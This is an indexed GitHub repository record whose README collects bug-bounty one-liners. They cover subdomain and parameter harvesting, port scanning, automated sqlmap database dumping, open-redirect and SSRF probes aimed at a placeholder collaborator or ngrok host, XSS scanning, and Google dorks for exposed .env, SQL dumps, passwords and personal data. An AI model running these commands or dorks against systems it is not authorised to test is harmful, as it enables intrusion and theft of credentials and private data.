{"id":20086099,"url":"https://github.com/brosck/bugbountytricks","last_synced_at":"2026-01-21T09:32:26.440Z","repository":{"id":115708086,"uuid":"409702988","full_name":"brosck/BugBountyTricks","owner":"brosck","description":"「🐞」Bug Bounty Tricks","archived":false,"fork":false,"pushed_at":"2023-10-04T17:38:39.000Z","size":60,"stargazers_count":38,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-03-02T14:29:39.376Z","etag":null,"topics":["bounty","bug","bugbounty","security","tips","tricks"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/brosck.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-09-23T18:29:31.000Z","updated_at":"2025-02-24T21:00:42.000Z","dependencies_parsed_at":null,"dependency_job_id":"e32d57ce-0d56-4cb0-a893-08a6ed555e42","html_url":"https://github.com/brosck/BugBountyTricks","commit_stats":null,"previous_names":["brosck/bugbountytricks"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/brosck/BugBountyTricks","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brosck%2FBugBountyTricks","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brosck%2FBugBountyTricks/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brosck%2FBugBountyTricks/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brosck%2FBugBountyTricks/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/brosck","download_url":"https://codeload.github.com/brosck/BugBountyTricks/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brosck%2FBugBountyTricks/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28631146,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-21T04:47:28.174Z","status":"ssl_error","status_checked_at":"2026-01-21T04:47:22.943Z","response_time":86,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bounty","bug","bugbounty","security","tips","tricks"],"created_at":"2024-11-13T16:00:33.344Z","updated_at":"2026-01-21T09:32:26.410Z","avatar_url":"https://github.com/brosck.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003e「🐞」Bug Bounty Tricks\u003c/h1\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://insights.dice.com/wp-content/uploads/2019/07/Bug-Bounty-Program-Dice.png\" weight=100 height=300\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eWelcome to my repository! I'll leave here all the tricks I developed throughout my career as a Bug Hunter, I hope to help you.\u003c/p\u003e\n\n# Requirements:\n\n* \u003c/p\u003e\u003ca href=\"https://github.com/tomnomnom/anew\"\u003eAnew\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/hahwul/dalfox\"\u003eDalfox\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/FortyNorthSecurity/EyeWitness\"\u003eEyewitness\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/003random/getJS\"\u003eGetJS\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/tomnomnom/gf\"\u003eGF\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/tomnomnom/hacks/tree/master/html-tool\"\u003eHTML-Tool\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/projectdiscovery/httpx\"\u003eHttpx\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/devanshbatham/ParamSpider\"\u003eParamspider\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/tomnomnom/qsreplace\"\u003eQsreplace\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/RustScan/RustScan\"\u003eRustscan\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/sqlmapproject/sqlmap\"\u003eSQLMap\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/aboul3la/Sublist3r\"\u003eSublist3r\u003c/a\u003e\u003c/p\u003e\n* \u003c/p\u003e\u003ca href=\"https://github.com/tomnomnom/waybackurls\"\u003eWaybackurls\u003c/a\u003e\u003c/p\u003e \n\n# Unix Terminal:\n\n### Extract subdomains and check if it's active\n\n```\nsublist3r -d scope.com -o extracted_subdomains.txt;cat extracted_subdomains.txt | httpx -silent -o verified_subdomains.txt;cat verified_subdomains.txt | awk -F[/:] '{print $4}' | anew \u003e subdomains.txt;rm verified_subdomains.txt extracted_subdomains.txt\n\ncat domains.txt | assetfinder -subs-only | httpx -silent | awk -F[/:] '{print $4}' | tee -a subdomains.txt\n```\n\n### Extract subdomains (manually)\n\n```\nfor scope in $(cat domains.txt);do curl \"https://web.archive.org/cdx/search/cdx?url=*.$scope/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\" | awk -F[/:] '{print $4}' | anew | sed -e 's/:80//' | httpx -silent | awk -F[/:] '{print $4}' | tee -a subdomains.txt;done\n```\n\n### Extract IPs from a list of subdomains\n\n```\nfor scope in $(cat subdomains.txt);do dig +short $scope | grep -o '[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}' | anew | tee -a ips.txt;done\n```\n\n### Extract parameters from a list of subdomains\n\n```\nfor scope in $(cat subdomains.txt);do paramspider -d $scope;done;cat output/* \u003e parameters.txt;rm -r output\n\ncat domains.txt | waybackurls | sed -e 's/:80//' | grep \"?[a-z0-9]*=\"\n```\n\n### Extract parameters from a list of subdomains (manually)\n\n```\nfor scope in $(cat domains.txt);do curl \"https://web.archive.org/cdx/search/cdx?url=*.$scope/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\" | grep \"?[a-z0-9]*=\" | sed -e 's/:80//' | tee -a parameters.txt;done\n```\n\n### Scan ports on a host quickly\n\n```\nSCOPE=192.168.0.0/24;RPORT=22,80,443;rustscan -b 500 -a $SCOPE -p $RPORT | grep \"Open $SCOPE[0-9]*\" | tee -a ports_scanned.txt\n```\n\n### Extract JS files with GetJS\n\n```\ncat subdomains.txt | getJS --complete | anew | tee -a js.txt\n```\n\n### Extract JS files\n\n```\nfor scope in $(cat subdomains.txt);do curl \"https://web.archive.org/cdx/search/cdx?url=$scope/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\" | grep \"\\\\.js\" | sed -e 's/:80//' | tee -a js.txt;done\n```\n\n### Extract json files\n\n```\ncat domains.txt | waybackurls | grep \"\\\\.json\" | anew | tee -a json.txt\n```\n\n### Extract subdomains and capture the screen\n\n```\nassetfinder -subs-only scope.com | httpx -silent -o verified_subdomains.txt;cat verified_subdomains.txt | awk -F[/:] '{print $4}' | anew \u003e subdomains.txt;rm verified_subdomains.txt;eyewitness -f subdomains.txt --prepend-https -d screenshots\n```\n\n### Extract subdomains and comments in source code\n\n```\nassetfinder -subs-only scope.com | httpx -silent | html-tool comments\n```\n\n### Extract subdomains by ASN\n\n```\necho AS394161 | asnmap -silent | tlsx -silent -san -cn -resp-only | sort -u\n```\n\n### Extract subdomains and open redirect parameters\n\n```\nassetfinder -subs-only scope.com | waybackurls | gf redirect | xargs -I@ sh -c 'oralyzer -u @'\n```\n\n### Extract all subdomains with CMS WordPress\n\n```\necho scope.com | assetfinder -subs-only | waybackurls | grep 'wp-content' | httpx -silent | awk -F[/:] '{print $4}' | anew\n```\n\n### Verify SQL Injection\n\n```\ncat domains.txt | waybackurls | grep \"?[a-z0-9]*=\" | sed -e 's/:80//' | gf sqli | sqlmap --risk 3 --batch --dbs\n```\n\n### Easy Open Redirect by endpoint injection\n\n```\nfor x in $(cat domains.txt | assetfinder -subs-only | httpx -silent);do echo \"$x//\u003cBURP SUITE COLLABORATOR OR NGROK\u003e/%2F..\" | httpx -silent -follow-redirects;done\n```\n\n### Automatic Open Redirect\n\n```\ncat domains.txt | waybackurls | gf redirect | qsreplace \u003chttp://BURP SUITE COLLABORATOR OR NGROK\u003e | httpx -silent -follow-redirects\n```\n\n### Automatic SSRF\n\n```\ncat domains.txt | waybackurls | gf ssrf | qsreplace \u003chttp://BURP SUITE COLLABORATOR OR NGROK\u003e | httpx -silent -follow-redirects\n```\n\n### Verify Cross-Site Scripting (XSS)\n\n```\ncat parameters.txt | gf xss \u003e xss_parameters.txt;dalfox file xss_parameters.txt --skip-bav -o dalfox.txt\n```\n\n# Google Dorks:\n\n### Confidential files\n\n```\nsite:*.scope.com ext:pdf intext:\"name\" intext:\"email\" intext:\"phone\" intext:\"address\"\nsite:*.scope.com ext:pdf intext:\"name\" intext:\"email\" intext:\"\u003c@domain.com\u003e\" intext:\"phone\" intext:\"address\"\nsite:*.scope.com ext:pdf intext:\"name\" intext:\"email\" intext:\"phone\" intext:\"city\" intext:\"state\" intext:\"zipcode\"\nsite:groups.google com \"\u003cTARGET\u003e\"\n```\n\n### Files containing credentials\n\n```\nsite:*.scope.com ext:sql\nsite:*.scope.com ext:env\nsite:*.scope.com ext:txt\nsite:*.scope.com ext:sql intext:\"Dumping data for table `users`\" | `password` | `name`\nsite:*.scope.com ext:txt intext:\"\u003c@domain.com\u003e\" intext:email intext:password\n```\n\n### Open Redirect\n\n* \u003ca href=\"https://www.openbugbounty.org/blog/devl00p/top-100-open-redirect-dorks/\"\u003eMore\u003c/a\u003e\n```\nsite:*.scope.com inurl:?RedirectUrl=\nsite:*.scope.com inurl:?page=\nsite:*.scope.com inurl:?url=\nsite:*.scope.com inurl:?uri=\nsite:*.scope.com inurl:?u=\nsite:*.scope.com inurl:?return=\nsite:*.scope.com inurl:?redirectBack=\nsite:*.scope.com inurl:?redir=\nsite:*.scope.com inurl:?returnurl=\nsite:*.scope.com inurl:?return_url=\nsite:*.scope.com inurl:?link=\nsite:*.scope.com inurl:?location=\nsite:*.scope.com inurl:?referrer=\nsite:*.scope.com inurl:?back=\nsite:*.scope.com inurl:?home=\nsite:*.scope.com inurl:?return_to=\nsite:*.scope.com inurl:?startUrl=\n```\n\n### (LFI) Local File Inclusion \u0026 (RFI) Remote File Inclusion\n\n* \u003ca href=\"https://github.com/Hood3dRob1n/BinGoo/blob/master/dorks/LFI-dork.lst\"\u003eMore\u003c/a\u003e\n```\nsite:*.scope.com inurl:?file=\nsite:*.scope.com inurl:download.php?file=\nsite:*.scope.com inurl:cat.php?file=\nsite:*.scope.com inurl:?cat=\nsite:*.scope.com inurl:read.php?file=\nsite:*.scope.com inurl:index.php?include=\nsite:*.scope.com inurl:index.php?file=\nsite:*.scope.com inurl:index.php?inc=\nsite:*.scope.com inurl:index.php?open=\nsite:*.scope.com inurl:index.php?content=\nsite:*.scope.com inurl:index.php?configFile=\nsite:*.scope.com inurl:index.php?page=\nsite:*.scope.com inurl:index.php?template=\nsite:*.scope.com inurl:index.php?archive=\n```\n\n### Sites with CMS WordPress\n\n```\nsite:*.scope.com inurl:wp-content\nsite:*.scope.com inurl:wp-content/uploads/\u003cYEAR\u003e/\u003cMONTH\u003e\nsite:*.scope.com inurl:wp-includes\nsite:*.scope.com intitle:\"Author at\"\nsite:*.scope.com intitle:WordPress intitle:ReadMe ext:html\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrosck%2Fbugbountytricks","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbrosck%2Fbugbountytricks","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrosck%2Fbugbountytricks/lists"}